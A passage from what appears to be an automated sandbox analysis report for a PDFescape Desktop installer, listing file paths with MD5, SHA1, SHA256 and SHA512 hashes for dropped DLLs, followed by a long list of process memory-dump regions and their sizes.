          58c639f842629bf97596add29b0ad19c

          SHA1

          059b152148a8fb92f9b8f119fa95608240ea2957

          SHA256

          40b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503

          SHA512

          f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a

          Download Submit
        • \Program Files\PDFescape Desktop\thumbnail-handler.dll
          MD5

          5c467cd8042003e71597dccb53a03bfb

          SHA1

          134db7349cfc485ee5f32b9583210843e02acdda

          SHA256

          2f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85

          SHA512

          b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99

          Download Submit
        • \ProgramData\PDFescape Desktop\Installation\Statistics.dll
          MD5

          e5a591c125fdf21381cf543ed7706c66

          SHA1

          0baad9f119616ce5d0d39d4cdc9c884c1002a24e

          SHA256

          15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

          SHA512

          20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

          Download Submit
        • \ProgramData\PDFescape Desktop\Installation\Statistics.dll
          MD5

          e5a591c125fdf21381cf543ed7706c66

          SHA1

          0baad9f119616ce5d0d39d4cdc9c884c1002a24e

          SHA256

          15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

          SHA512

          20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

          Download Submit
        • \ProgramData\PDFescape Desktop\Installation\Statistics.dll
          MD5

          e5a591c125fdf21381cf543ed7706c66

          SHA1

          0baad9f119616ce5d0d39d4cdc9c884c1002a24e

          SHA256

          15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

          SHA512

          20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

          Download Submit
        • \Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\_isetup\_isdecmp.dll
          MD5

          c6ae924ad02500284f7e4efa11fa7cfc

          SHA1

          2a7770b473b0a7dc9a331d017297ff5af400fed8

          SHA256

          31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

          SHA512

          f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

          Download Submit
        • \Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\_isetup\_isdecmp.dll
          MD5

          c6ae924ad02500284f7e4efa11fa7cfc

          SHA1

          2a7770b473b0a7dc9a331d017297ff5af400fed8

          SHA256

          31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

          SHA512

          f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

          Download Submit
        • memory/1832-114-0x0000000000400000-0x0000000000501000-memory.dmp
          Filesize

          1.0MB

          Download
        • memory/1840-115-0x0000000000000000-mapping.dmp
          Download
        • memory/1840-121-0x00000000009E0000-0x00000000009E1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1840-119-0x0000000003601000-0x0000000003605000-memory.dmp
          Filesize

          16KB

          Download
        • memory/2104-125-0x0000000000000000-mapping.dmp
          Download
        • memory/2332-135-0x0000000000000000-mapping.dmp
          Download
        • memory/2332-165-0x0000000004750000-0x0000000004751000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2332-218-0x0000000004752000-0x0000000004753000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2332-228-0x0000000004753000-0x0000000004754000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-198-0x0000000007CD0000-0x0000000007CD1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-207-0x0000000007DB0000-0x0000000007DB1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-194-0x0000000007500000-0x0000000007501000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-229-0x0000000007063000-0x0000000007064000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-217-0x0000000007062000-0x0000000007063000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-202-0x0000000007D40000-0x0000000007D41000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-205-0x0000000007060000-0x0000000007061000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2744-134-0x0000000000000000-mapping.dmp
          Download
        • memory/2792-300-0x0000000000000000-mapping.dmp
          Download
        • memory/3564-122-0x0000000000000000-mapping.dmp
          Download
        • memory/3808-128-0x0000000000000000-mapping.dmp
          Download
        • memory/3948-133-0x0000000000000000-mapping.dmp
          Download
        • memory/3948-226-0x0000000006633000-0x0000000006634000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3948-154-0x0000000006C70000-0x0000000006C71000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3948-149-0x0000000006580000-0x0000000006581000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3948-214-0x0000000006632000-0x0000000006633000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3948-161-0x0000000006630000-0x0000000006631000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3992-220-0x00000000064E2000-0x00000000064E3000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3992-210-0x00000000064E0000-0x00000000064E1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3992-136-0x0000000000000000-mapping.dmp
          Download
        • memory/3992-235-0x00000000064E3000-0x00000000064E4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4132-164-0x00000000046B0000-0x00000000046B1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4132-171-0x00000000046B2000-0x00000000046B3000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4132-231-0x00000000046B3000-0x00000000046B4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4132-137-0x0000000000000000-mapping.dmp
          Download
        • memory/4172-138-0x0000000000000000-mapping.dmp
          Download
        • memory/4172-176-0x00000000066C2000-0x00000000066C3000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4172-234-0x00000000066C3000-0x00000000066C4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4172-185-0x00000000066C0000-0x00000000066C1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4256-173-0x0000000004E60000-0x0000000004E61000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4256-144-0x0000000000000000-mapping.dmp
          Download
        • memory/4256-233-0x0000000004E63000-0x0000000004E64000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4256-180-0x0000000004E62000-0x0000000004E63000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4332-147-0x0000000000000000-mapping.dmp
          Download
        • memory/4332-232-0x0000000005313000-0x0000000005314000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4332-190-0x0000000005312000-0x0000000005313000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4332-183-0x0000000005310000-0x0000000005311000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4400-227-0x0000000006AF3000-0x0000000006AF4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4400-189-0x0000000006AF0000-0x0000000006AF1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4400-153-0x0000000000000000-mapping.dmp
          Download
        • memory/4400-197-0x0000000006AF2000-0x0000000006AF3000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4476-159-0x0000000000000000-mapping.dmp
          Download
        • memory/4476-193-0x0000000006A40000-0x0000000006A41000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4476-201-0x0000000006A42000-0x0000000006A43000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4476-230-0x0000000006A43000-0x0000000006A44000-memory.dmp
          Filesize

          4KB

          Download
        • memory/7012-301-0x0000000000000000-mapping.dmp
          Download
        • memory/7700-264-0x0000000000000000-mapping.dmp
          Download
        • memory/8076-294-0x0000000000000000-mapping.dmp
          Download
        • memory/8596-304-0x0000000000000000-mapping.dmp
          Download
        • memory/10120-261-0x0000000000000000-mapping.dmp
          Download
        • memory/10820-305-0x0000000000000000-mapping.dmp
          Download
        • memory/10824-273-0x0000000000000000-mapping.dmp
          Download
        • memory/11140-295-0x0000000000000000-mapping.dmp
          Download
        • memory/11876-297-0x0000000000000000-mapping.dmp
          Download
        • memory/12332-302-0x0000000000000000-mapping.dmp
          Download
        • memory/13076-303-0x0000000000000000-mapping.dmp
          Download
        • memory/13416-276-0x0000000000000000-mapping.dmp
          Download
        • memory/14080-298-0x0000000000000000-mapping.dmp
          Download
        • memory/16564-279-0x0000000000000000-mapping.dmp
          Download
        • memory/17588-299-0x0000000000000000-mapping.dmp
          Download
        • memory/18156-256-0x0000000000000000-mapping.dmp
          Download
        • memory/19072-296-0x0000000000000000-mapping.dmp
          Download